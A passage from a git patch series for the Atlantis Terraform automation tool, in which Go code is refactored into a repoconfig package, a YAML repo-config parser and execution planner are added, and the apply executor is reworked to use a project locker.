new workspace automatically. - _, err = p.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) + _, err = p.Meta.TerraformExecutor.RunCommandWithVersion(p.Meta.Log, p.Meta.AbsolutePath, []string{workspaceCmd, "new", "-no-color", p.Meta.Workspace}, p.Meta.TerraformVersion, p.Meta.Workspace) return err } return nil diff --git a/server/events/atlantisyaml/plan_step_test.go b/server/events/repoconfig/plan_step_test.go similarity index 90% rename from server/events/atlantisyaml/plan_step_test.go rename to server/events/repoconfig/plan_step_test.go index d5d7502992..7e9e8b1f22 100644 --- a/server/events/atlantisyaml/plan_step_test.go +++ b/server/events/repoconfig/plan_step_test.go @@ -1,4 +1,4 @@ -package atlantisyaml_test +package repoconfig_test import ( "errors" @@ -9,8 +9,8 @@ import ( "github.com/hashicorp/go-version" . "github.com/petergtz/pegomock" - "github.com/runatlantis/atlantis/server/events/atlantisyaml" "github.com/runatlantis/atlantis/server/events/mocks/matchers" + "github.com/runatlantis/atlantis/server/events/repoconfig" matchers2 "github.com/runatlantis/atlantis/server/events/run/mocks/matchers" "github.com/runatlantis/atlantis/server/events/terraform/mocks" "github.com/runatlantis/atlantis/server/logging" @@ -25,18 +25,18 @@ func TestRun_NoWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "default" - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -61,18 +61,18 @@ func TestRun_ErrWorkspaceIn08(t *testing.T) { tfVersion, _ := version.NewVersion("0.8") logger := logging.NewNoopLogger() workspace := "notdefault" - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: workspace, AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -112,18 +112,18 @@ func TestRun_SwitchesWorkspace(t *testing.T) { tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(matchers.AnyPtrToLoggingSimpleLogger(), AnyString(), AnyStringSlice(), matchers2.AnyPtrToGoVersionVersion(), AnyString())). @@ -170,18 +170,18 @@ func TestRun_CreatesWorkspace(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion(c.tfVersion) logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } // Ensure that we actually try to switch workspaces by making the @@ -212,18 +212,18 @@ func TestRun_NoWorkspaceSwitchIfNotNecessary(t *testing.T) { terraform := mocks.NewMockClient() tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: "/path", DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } When(terraform.RunCommandWithVersion(logger, "/path", []string{"workspace", "show"}, tfVersion, "workspace")).ThenReturn("workspace\n", nil) @@ -247,7 +247,7 @@ func TestRun_AddsEnvVarFile(t *testing.T) { terraform := mocks.NewMockClient() // Create the env/workspace.tfvars file. - tmpDir, cleanup := tmpDir_stepTests(t) + tmpDir, cleanup := TempDir(t) defer cleanup() err := os.MkdirAll(filepath.Join(tmpDir, "env"), 0700) Ok(t, err) @@ -258,18 +258,18 @@ func TestRun_AddsEnvVarFile(t *testing.T) { // Using version >= 0.10 here so we don't expect any env commands. tfVersion, _ := version.NewVersion("0.10.0") logger := logging.NewNoopLogger() - s := atlantisyaml.PlanStep{ - Meta: atlantisyaml.StepMeta{ + s := repoconfig.PlanStep{ + Meta: repoconfig.StepMeta{ Log: logger, Workspace: "workspace", AbsolutePath: tmpDir, DirRelativeToRepoRoot: ".", + TerraformExecutor: terraform, TerraformVersion: tfVersion, ExtraCommentArgs: []string{"comment", "args"}, Username: "username", }, - ExtraArgs: []string{"extra", "args"}, - TerraformExecutor: terraform, + ExtraArgs: []string{"extra", "args"}, } expPlanArgs := []string{"plan", "-refresh", "-no-color", "-out", filepath.Join(tmpDir, "workspace.tfplan"), "-var", "atlantis_user=username", "extra", "args", "comment", "args", "-var-file", envVarsFile} From 7dfab213e8d84a1984da7ff75abf26fe55fc71d2 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 5 Jun 2018 17:23:58 +0100 Subject: [PATCH 09/69] Parse config and build execution plan. --- server/events/repoconfig/config.go | 188 ++++++++++++++++++ server/events/repoconfig/execution_planner.go | 144 ++++++++++++++ server/events/repoconfig/repoconfig.go | 87 ++++++++ testing/assertions.go | 2 +- 4 files changed, 420 insertions(+), 1 deletion(-) create mode 100644 server/events/repoconfig/config.go create mode 100644 server/events/repoconfig/execution_planner.go create mode 100644 server/events/repoconfig/repoconfig.go diff --git a/server/events/repoconfig/config.go b/server/events/repoconfig/config.go new file mode 100644 index 0000000000..48a0a9e388 --- /dev/null +++ b/server/events/repoconfig/config.go @@ -0,0 +1,188 @@ +package repoconfig + +import "fmt" + +type RepoConfig struct { + Version int `yaml:"version"` + Projects []Project `yaml:"projects"` + Workflows map[string]Workflow `yaml:"workflows"` +} + +type Project struct { + Dir string `yaml:"dir"` + Workspace string `yaml:"workspace"` + Workflow string `yaml:"workflow"` + TerraformVersion string `yaml:"terraform_version"` + AutoPlan *AutoPlan `yaml:"auto_plan,omitempty"` + ApplyRequirements []string `yaml:"apply_requirements"` +} + +func (p *Project) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Project + // Set up defaults. + defaults := alias{ + Workspace: defaultWorkspace, + AutoPlan: &AutoPlan{ + Enabled: true, + WhenModified: []string{"**/*.tf"}, + }, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *p = Project(defaults) + return nil +} + +type AutoPlan struct { + WhenModified []string `yaml:"when_modified"` + Enabled bool `yaml:"enabled"` // defaults to true +} + +func (a *AutoPlan) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias AutoPlan + // Set up defaults. + defaults := alias{ + // If not specified, we assume it's enabled. + Enabled: true, + } + if err := unmarshal(&defaults); err != nil { + return err + } + *a = AutoPlan(defaults) + return nil +} + +type Workflow struct { + Apply *Stage `yaml:"apply"` // defaults to regular apply steps + Plan *Stage `yaml:"plan"` // defaults to regular plan steps +} + +func (p *Workflow) UnmarshalYAML(unmarshal func(interface{}) error) error { + // Use a type alias so unmarshal doesn't get into an infinite loop. + type alias Workflow + var tmp alias + if err := unmarshal(&tmp); err != nil { + return err + } + *p = Workflow(tmp) + + // If plan or apply keys aren't specified we use the default workflow. + if p.Apply == nil { + p.Apply = &Stage{ + []StepConfig{ + { + StepType: "apply", + }, + }, + } + } + + if p.Plan == nil { + p.Plan = &Stage{ + []StepConfig{ + { + StepType: "init", + }, + { + StepType: "plan", + }, + }, + } + } + + return nil +} + +type Stage struct { + Steps []StepConfig `yaml:"steps"` // can either be a built in step like 'plan' or a custom step like 'run: echo hi' +} + +type StepConfig struct { + StepType string + ExtraArgs []string +} + +func (s *StepConfig) UnmarshalYAML(unmarshal func(interface{}) error) error { + // First try to unmarshal as a single string, ex. + // steps: + // - init + // - plan + var singleString string + err := unmarshal(&singleString) + if err == nil { + if singleString != "init" && singleString != "plan" && singleString != "apply" { + return fmt.Errorf("unsupported step type: %q", singleString) + } + s.StepType = singleString + return nil + } + + // Next, try to unmarshal as a built-in command with extra_args set, ex. + // steps: + // - init: + /// extra_args: ["arg1"] + // + // We need to create a struct for each step so go-yaml knows to call into + // our routine based on the key (ex. init, plan, etc). + // We use a map[string]interface{} as the value so we can manually + // validate key names and return better errors. This is instead of: + // Init struct{ + // ExtraArgs []string `yaml:"extra_args"` + // } `yaml:"init"` + + validateBuiltIn := func(stepType string, args map[string]interface{}) error { + s.StepType = stepType + for k, v := range args { + if k != "extra_args" { + return fmt.Errorf("unsupported key %q for step %s – the only supported key is extra_args", k, stepType) + } + + // parse as []string + val, ok := v.([]interface{}) + if !ok { + return fmt.Errorf("expected array of strings as value of extra_args, not %q", v) + } + var finalVals []string + for _, i := range val { + finalVals = append(finalVals, fmt.Sprintf("%s", i)) + } + s.ExtraArgs = finalVals + } + return nil + } + var initStep struct { + Init map[string]interface{} `yaml:"init"` + } + if err = unmarshal(&initStep); err == nil { + return validateBuiltIn("init", initStep.Init) + } + + var planStep struct { + Plan map[string]interface{} `yaml:"plan"` + } + if err = unmarshal(&planStep); err == nil { + return validateBuiltIn("plan", planStep.Plan) + } + + var applyStep struct { + Apply map[string]interface{} `yaml:"apply"` + } + if err = unmarshal(&applyStep); err == nil { + return validateBuiltIn("apply", applyStep.Apply) + } + + // todo: run step + // Try to unmarshal as a custom run step, ex. + // steps: + // - run: my command + //var runStep struct { + // Run string `yaml:"run"` + //} + //if err = unmarshal(&runStep); err == nil { + // + //} + return err +} diff --git a/server/events/repoconfig/execution_planner.go b/server/events/repoconfig/execution_planner.go new file mode 100644 index 0000000000..02cba0496f --- /dev/null +++ b/server/events/repoconfig/execution_planner.go @@ -0,0 +1,144 @@ +package repoconfig + +import ( + "fmt" + "path/filepath" + + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type ExecutionPlanner struct { + TerraformExecutor TerraformExec + DefaultTFVersion *version.Version + ConfigReader *Reader +} + +type TerraformExec interface { + RunCommandWithVersion(log *logging.SimpleLogger, path string, args []string, v *version.Version, workspace string) (string, error) +} + +func (s *ExecutionPlanner) BuildPlanStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*PlanStage, error) { + defaults := s.defaultPlanSteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(PlanStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &PlanStage{ + Steps: steps, + }, nil +} + +func (s *ExecutionPlanner) buildStage(stageName string, log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string, defaults []Step) ([]Step, error) { + config, err := s.ConfigReader.ReadConfig(repoDir) + if err != nil { + return nil, err + } + + // If there's no config file, use defaults. + if config == nil { + log.Info("no %s file found––continuing with defaults", AtlantisYAMLFilename) + return defaults, nil + } + + // Get this project's configuration. + for _, p := range config.Projects { + if p.Dir == relProjectPath && p.Workspace == workspace { + workflowName := p.Workflow + + // If they didn't specify a workflow, use the default. + if workflowName == "" { + log.Info("no %s workflow set––continuing with defaults", AtlantisYAMLFilename) + return defaults, nil + } + + // If they did specify a workflow, find it. + workflow, exists := config.Workflows[workflowName] + if !exists { + return nil, fmt.Errorf("no workflow with key %q defined", workflowName) + } + + // We have a workflow defined, so now we need to build it. + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + var steps []Step + var stepsConfig []StepConfig + if stageName == PlanStageName { + stepsConfig = workflow.Plan.Steps + } else { + stepsConfig = workflow.Apply.Steps + } + for _, stepConfig := range stepsConfig { + var step Step + switch stepConfig.StepType { + case "init": + step = &InitStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + case "plan": + step = &PlanStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + case "apply": + step = &ApplyStep{ + Meta: meta, + ExtraArgs: stepConfig.ExtraArgs, + } + } + // todo: custom step + steps = append(steps, step) + } + return steps, nil + } + } + return nil, fmt.Errorf("no project with dir %q and workspace %q defined", relProjectPath, workspace) +} + +func (s *ExecutionPlanner) BuildApplyStage(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) (*ApplyStage, error) { + defaults := s.defaultApplySteps(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + steps, err := s.buildStage(ApplyStageName, log, repoDir, workspace, relProjectPath, extraCommentArgs, username, defaults) + if err != nil { + return nil, err + } + return &ApplyStage{ + Steps: steps, + }, nil +} + +func (s *ExecutionPlanner) buildMeta(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) StepMeta { + return StepMeta{ + Log: log, + Workspace: workspace, + AbsolutePath: filepath.Join(repoDir, relProjectPath), + DirRelativeToRepoRoot: relProjectPath, + // If there's no config then we should use the default tf version. + TerraformVersion: s.DefaultTFVersion, + TerraformExecutor: s.TerraformExecutor, + ExtraCommentArgs: extraCommentArgs, + Username: username, + } +} + +func (s *ExecutionPlanner) defaultPlanSteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + return []Step{ + &InitStep{ + ExtraArgs: nil, + Meta: meta, + }, + &PlanStep{ + ExtraArgs: nil, + Meta: meta, + }, + } +} +func (s *ExecutionPlanner) defaultApplySteps(log *logging.SimpleLogger, repoDir string, workspace string, relProjectPath string, extraCommentArgs []string, username string) []Step { + meta := s.buildMeta(log, repoDir, workspace, relProjectPath, extraCommentArgs, username) + return []Step{ + &ApplyStep{ + ExtraArgs: nil, + Meta: meta, + }, + } +} diff --git a/server/events/repoconfig/repoconfig.go b/server/events/repoconfig/repoconfig.go new file mode 100644 index 0000000000..6d71d7de0d --- /dev/null +++ b/server/events/repoconfig/repoconfig.go @@ -0,0 +1,87 @@ +package repoconfig + +import ( + "github.com/hashicorp/go-version" + "github.com/runatlantis/atlantis/server/logging" +) + +type ApplyRequirement interface { + // IsMet returns true if the requirement is met and false if not. + // If it returns false, it also returns a string describing why not. + IsMet() (bool, string) +} + +type PlanStage struct { + Steps []Step +} + +type ApplyStage struct { + Steps []Step + ApplyRequirements []ApplyRequirement +} + +func (p PlanStage) Run() (string, error) { + var outputs string + for _, step := range p.Steps { + out, err := step.Run() + if err != nil { + return outputs, err + } + if out != "" { + // Outputs are separated by newlines. + outputs += "\n" + out + } + } + return outputs, nil +} + +func (a ApplyStage) Run() (string, error) { + var outputs string + for _, step := range a.Steps { + out, err := step.Run() + if err != nil { + return outputs, err + } + if out != "" { + // Outputs are separated by newlines. + outputs += "\n" + out + } + } + return outputs, nil +} + +type Step interface { + // Run runs the step. It returns any output that needs to be commented back + // onto the pull request and error. + Run() (string, error) +} + +// StepMeta is the data that is available to all steps. +type StepMeta struct { + Log *logging.SimpleLogger + Workspace string + // AbsolutePath is the path to this project on disk. It's not necessarily + // the repository root since a project can be in a subdir of the root. + AbsolutePath string + // DirRelativeToRepoRoot is the directory for this project relative + // to the repo root. + DirRelativeToRepoRoot string + TerraformVersion *version.Version + TerraformExecutor TerraformExec + // ExtraCommentArgs are the arguments that may have been appended to the comment. + // For example 'atlantis plan -- -target=resource'. They are already quoted + // further up the call tree to mitigate security issues. + ExtraCommentArgs []string + // VCS username of who caused this step to be executed. For example the + // commenter, or who pushed a new commit. + Username string +} + +// MustConstraint returns a constraint. It panics on error. +func MustConstraint(constraint string) version.Constraints { + c, err := version.NewConstraint(constraint) + if err != nil { + panic(err) + } + return c +} diff --git a/testing/assertions.go b/testing/assertions.go index efb2ce9b14..5b6ad147bd 100644 --- a/testing/assertions.go +++ b/testing/assertions.go @@ -73,7 +73,7 @@ func ErrContains(tb testing.TB, substr string, act error) { tb.Fatalf("exp err to contain %q but err was nil", substr) } if !strings.Contains(act.Error(), substr) { - tb.Fatalf("exp err %q to contain $q", act.Error(), substr) + tb.Fatalf("exp err %q to contain %q", act.Error(), substr) } } From 2175b50472f3ec788dcfc4e7f51e98b27309cc30 Mon Sep 17 00:00:00 2001 From: Luke Kysow Date: Tue, 5 Jun 2018 18:54:49 +0100 Subject: [PATCH 10/69] Use new steps in plan/apply - Fix lockURL issues by adding new Router object. - Use new ProjectLocker and delete PreProjectExecutor. --- server/events/apply_executor.go | 125 +++----- server/events/command_handler.go | 6 - .../mocks/matchers/events_preexecuteresult.go | 20 -- .../events/mocks/mock_lock_url_generator.go | 35 ++- .../events/mocks/mock_project_pre_executor.go | 85 ------ server/events/plan_executor.go | 117 ++------ server/events/plan_executor_test.go | 3 - server/events/project_locker.go | 87 ++++++ server/events/project_locker_test.go | 269 +++++++++++++++++ server/events/project_pre_execute.go | 140 --------- server/events/project_pre_execute_test.go | 282 ------------------ server/router.go | 31 ++ server/server.go | 60 ++-- server/server_test.go | 2 +- 14 files changed, 509 insertions(+), 753 deletions(-) delete mode 100644 server/events/mocks/matchers/events_preexecuteresult.go delete mode 100644 server/events/mocks/mock_project_pre_executor.go create mode 100644 server/events/project_locker.go create mode 100644 server/events/project_locker_test.go delete mode 100644 server/events/project_pre_execute.go delete mode 100644 server/events/project_pre_execute_test.go create mode 100644 server/router.go diff --git a/server/events/apply_executor.go b/server/events/apply_executor.go index 0ca0dc044f..534546997d 100644 --- a/server/events/apply_executor.go +++ b/server/events/apply_executor.go @@ -14,12 +14,8 @@ package events import ( - "fmt" - "os" - "path/filepath" - - "github.com/pkg/errors" "github.com/runatlantis/atlantis/server/events/models" + "github.com/runatlantis/atlantis/server/events/repoconfig" "github.com/runatlantis/atlantis/server/events/run" "github.com/runatlantis/atlantis/server/events/terraform" "github.com/runatlantis/atlantis/server/events/vcs" @@ -33,22 +29,23 @@ type ApplyExecutor struct { RequireApproval bool Run *run.Run AtlantisWorkspace AtlantisWorkspace - ProjectPreExecute *DefaultProjectPreExecutor + ProjectLocker *DefaultProjectLocker Webhooks webhooks.Sender + ExecutionPlanner *repoconfig.ExecutionPlanner } // Execute executes apply for the ctx. func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { - if a.RequireApproval { - approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} - } - if !approved { - return CommandResponse{Failure: "Pull request must be approved before running apply."} - } - ctx.Log.Info("confirmed pull request was approved") - } + //if a.RequireApproval { + // approved, err := a.VCSClient.PullIsApproved(ctx.BaseRepo, ctx.Pull) + // if err != nil { + // return CommandResponse{Error: errors.Wrap(err, "checking if pull request was approved")} + // } + // if !approved { + // return CommandResponse{Failure: "Pull request must be approved before running apply."} + // } + // ctx.Log.Info("confirmed pull request was approved") + //} repoDir, err := a.AtlantisWorkspace.GetWorkspace(ctx.BaseRepo, ctx.Pull, ctx.Command.Workspace) if err != nil { @@ -56,78 +53,33 @@ func (a *ApplyExecutor) Execute(ctx *CommandContext) CommandResponse { } ctx.Log.Info("found workspace in %q", repoDir) - // Plans are stored at project roots by their workspace names. We just - // need to find them. - var plans []models.Plan - // If they didn't specify a directory, we apply all plans we can find for - // this workspace. - if ctx.Command.Dir == "" { - err = filepath.Walk(repoDir, func(path string, info os.FileInfo, err error) error { - if err != nil { - return err - } - // Check if the plan is for the right workspace, - if !info.IsDir() && info.Name() == ctx.Command.Workspace+".tfplan" { - rel, _ := filepath.Rel(repoDir, filepath.Dir(path)) - plans = append(plans, models.Plan{ - Project: models.NewProject(ctx.BaseRepo.FullName, rel), - LocalPath: path, - }) - } - return nil - }) - if err != nil { - return CommandResponse{Error: errors.Wrap(err, "finding plans")} - } - } else { - // If they did specify a dir, we apply just the plan in that directory - // for this workspace. - planPath := filepath.Join(repoDir, ctx.Command.Dir, ctx.Command.Workspace+".tfplan") - stat, err := os.Stat(planPath) - if err != nil || stat.IsDir() { - return CommandResponse{Error: fmt.Errorf("no plan found at path %q and workspace %q–did you run plan?", ctx.Command.Dir, ctx.Command.Workspace)} - } - relProjectPath, _ := filepath.Rel(repoDir, filepath.Dir(planPath)) - plans = append(plans, models.Plan{ - Project: models.NewProject(ctx.BaseRepo.FullName, relProjectPath), - LocalPath: planPath, - }) - } - if len(plans) == 0 { - return CommandResponse{Failure: "No plans found for that workspace."} - } - var paths []string - for _, p := range plans { - paths = append(paths, p.LocalPath) + stage, err := a.ExecutionPlanner.BuildApplyStage(ctx.Log, repoDir, ctx.Command.Workspace, ctx.Command.Dir, ctx.Command.Flags, ctx.User.Username) + if err != nil { + return CommandResponse{Error: err} } - ctx.Log.Info("found %d plan(s) in our workspace: %v", len(plans), paths) - var results []ProjectResult - for _, plan := range plans { - ctx.Log.Info("running apply for project at path %q", plan.Project.Path) - result := a.apply(ctx, repoDir, plan) - result.Path = plan.LocalPath - results = append(results, result) + // check if we have the lock + tryLockResponse, err := a.ProjectLocker.TryLock(ctx, models.NewProject(ctx.BaseRepo.FullName, ctx.Command.Dir)) + if err != nil { + return CommandResponse{ProjectResults: []ProjectResult{{Error: err}}} + } + if !tryLockResponse.LockAcquired { + return CommandResponse{ProjectResults: []ProjectResult{{Failure: tryLockResponse.LockFailureReason}}} } - return CommandResponse{ProjectResults: results} -} -func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.Plan) ProjectResult { - preExecute := a.ProjectPreExecute.Execute(ctx, repoDir, plan.Project) - if preExecute.ProjectResult != (ProjectResult{}) { - return preExecute.ProjectResult + // Check apply requirements. + for _, req := range stage.ApplyRequirements { + isMet, reason := req.IsMet() + if !isMet { + return CommandResponse{Failure: reason} + } } - config := preExecute.ProjectConfig - terraformVersion := preExecute.TerraformVersion - applyExtraArgs := config.GetExtraArguments(ctx.Command.Name.String()) - absolutePath := filepath.Join(repoDir, plan.Project.Path) - workspace := ctx.Command.Workspace - tfApplyCmd := append(append(append([]string{"apply", "-no-color"}, applyExtraArgs...), ctx.Command.Flags...), plan.LocalPath) - output, err := a.Terraform.RunCommandWithVersion(ctx.Log, absolutePath, tfApplyCmd, terraformVersion, workspace) + out, err := stage.Run() + // Send webhooks even if there's an error. a.Webhooks.Send(ctx.Log, webhooks.ApplyResult{ // nolint: errcheck - Workspace: workspace, + Workspace: ctx.Command.Workspace, User: ctx.User, Repo: ctx.BaseRepo, Pull: ctx.Pull, @@ -135,16 +87,7 @@ func (a *ApplyExecutor) apply(ctx *CommandContext, repoDir string, plan models.P }) if err != nil { - return ProjectResult{Error: fmt.Errorf("%s\n%s", err.Error(), output)} + return CommandResponse{Error: err} } - ctx.Log.Info("apply succeeded") - - if len(config.PostApply) > 0 { - _, err := a.Run.Execute(ctx.Log, config.PostApply, absolutePath, workspace, terraformVersion, "post_apply") - if err != nil { - return ProjectResult{Error: errors.Wrap(err, "running post apply commands")} - } - } - - return ProjectResult{ApplySuccess: output} + return CommandResponse{ProjectResults: []ProjectResult{{ApplySuccess: out}}} } diff --git a/server/events/command_handler.go b/server/events/command_handler.go index 52dd2090bd..047d5f936a 100644 --- a/server/events/command_handler.go +++ b/server/events/command_handler.go @@ -55,7 +55,6 @@ type GitlabMergeRequestGetter interface { type CommandHandler struct { PlanExecutor Executor ApplyExecutor Executor - LockURLGenerator LockURLGenerator VCSClient vcs.ClientProxy GithubPullGetter GithubPullGetter GitlabMergeRequestGetter GitlabMergeRequestGetter @@ -137,11 +136,6 @@ func (c *CommandHandler) buildLogger(repoFullName string, pullNum int) *logging. return logging.NewSimpleLogger(src, c.Logger.Underlying(), true, c.Logger.GetLevel()) } -// SetLockURL sets a function that's used to return the URL for a lock. -func (c *CommandHandler) SetLockURL(f func(id string) (url string)) { - c.LockURLGenerator.SetLockURL(f) -} - func (c *CommandHandler) run(ctx *CommandContext) { log := c.buildLogger(ctx.BaseRepo.FullName, ctx.Pull.Num) ctx.Log = log diff --git a/server/events/mocks/matchers/events_preexecuteresult.go b/server/events/mocks/matchers/events_preexecuteresult.go deleted file mode 100644 index b8be09b1a2..0000000000 --- a/server/events/mocks/matchers/events_preexecuteresult.go +++ /dev/null @@ -1,20 +0,0 @@ -package matchers - -import ( - "reflect" - - "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" -) - -func AnyEventsPreExecuteResult() events.PreExecuteResult { - pegomock.RegisterMatcher(pegomock.NewAnyMatcher(reflect.TypeOf((*(events.PreExecuteResult))(nil)).Elem())) - var nullValue events.PreExecuteResult - return nullValue -} - -func EqEventsPreExecuteResult(value events.PreExecuteResult) events.PreExecuteResult { - pegomock.RegisterMatcher(&pegomock.EqMatcher{Value: value}) - var nullValue events.PreExecuteResult - return nullValue -} diff --git a/server/events/mocks/mock_lock_url_generator.go b/server/events/mocks/mock_lock_url_generator.go index 0a31fc85f8..8a62a2c3b2 100644 --- a/server/events/mocks/mock_lock_url_generator.go +++ b/server/events/mocks/mock_lock_url_generator.go @@ -17,9 +17,16 @@ func NewMockLockURLGenerator() *MockLockURLGenerator { return &MockLockURLGenerator{fail: pegomock.GlobalFailHandler} } -func (mock *MockLockURLGenerator) SetLockURL(_param0 func(string) string) { - params := []pegomock.Param{_param0} - pegomock.GetGenericMockFrom(mock).Invoke("SetLockURL", params, []reflect.Type{}) +func (mock *MockLockURLGenerator) GenerateLockURL(lockID string) string { + params := []pegomock.Param{lockID} + result := pegomock.GetGenericMockFrom(mock).Invoke("GenerateLockURL", params, []reflect.Type{reflect.TypeOf((*string)(nil)).Elem()}) + var ret0 string + if len(result) != 0 { + if result[0] != nil { + ret0 = result[0].(string) + } + } + return ret0 } func (mock *MockLockURLGenerator) VerifyWasCalledOnce() *VerifierLockURLGenerator { @@ -40,28 +47,28 @@ type VerifierLockURLGenerator struct { inOrderContext *pegomock.InOrderContext } -func (verifier *VerifierLockURLGenerator) SetLockURL(_param0 func(string) string) *LockURLGenerator_SetLockURL_OngoingVerification { - params := []pegomock.Param{_param0} - methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "SetLockURL", params) - return &LockURLGenerator_SetLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} +func (verifier *VerifierLockURLGenerator) GenerateLockURL(lockID string) *LockURLGenerator_GenerateLockURL_OngoingVerification { + params := []pegomock.Param{lockID} + methodInvocations := pegomock.GetGenericMockFrom(verifier.mock).Verify(verifier.inOrderContext, verifier.invocationCountMatcher, "GenerateLockURL", params) + return &LockURLGenerator_GenerateLockURL_OngoingVerification{mock: verifier.mock, methodInvocations: methodInvocations} } -type LockURLGenerator_SetLockURL_OngoingVerification struct { +type LockURLGenerator_GenerateLockURL_OngoingVerification struct { mock *MockLockURLGenerator methodInvocations []pegomock.MethodInvocation } -func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetCapturedArguments() func(string) string { - _param0 := c.GetAllCapturedArguments() - return _param0[len(_param0)-1] +func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetCapturedArguments() string { + lockID := c.GetAllCapturedArguments() + return lockID[len(lockID)-1] } -func (c *LockURLGenerator_SetLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []func(string) string) { +func (c *LockURLGenerator_GenerateLockURL_OngoingVerification) GetAllCapturedArguments() (_param0 []string) { params := pegomock.GetGenericMockFrom(c.mock).GetInvocationParams(c.methodInvocations) if len(params) > 0 { - _param0 = make([]func(string) string, len(params[0])) + _param0 = make([]string, len(params[0])) for u, param := range params[0] { - _param0[u] = param.(func(string) string) + _param0[u] = param.(string) } } return diff --git a/server/events/mocks/mock_project_pre_executor.go b/server/events/mocks/mock_project_pre_executor.go deleted file mode 100644 index cd36116f3a..0000000000 --- a/server/events/mocks/mock_project_pre_executor.go +++ /dev/null @@ -1,85 +0,0 @@ -// Automatically generated by pegomock. DO NOT EDIT! -// Source: github.com/runatlantis/atlantis/server/events (interfaces: ProjectPreExecutor) - -package mocks - -import ( - "reflect" - - pegomock "github.com/petergtz/pegomock" - events "github.com/runatlantis/atlantis/server/events" - models "github.com/runatlantis/atlantis/server/events/models" -) - -type MockProjectPreExecutor struct { - fail func(message string, callerSkip ...int) -} - -func NewMockProjectPreExecutor() 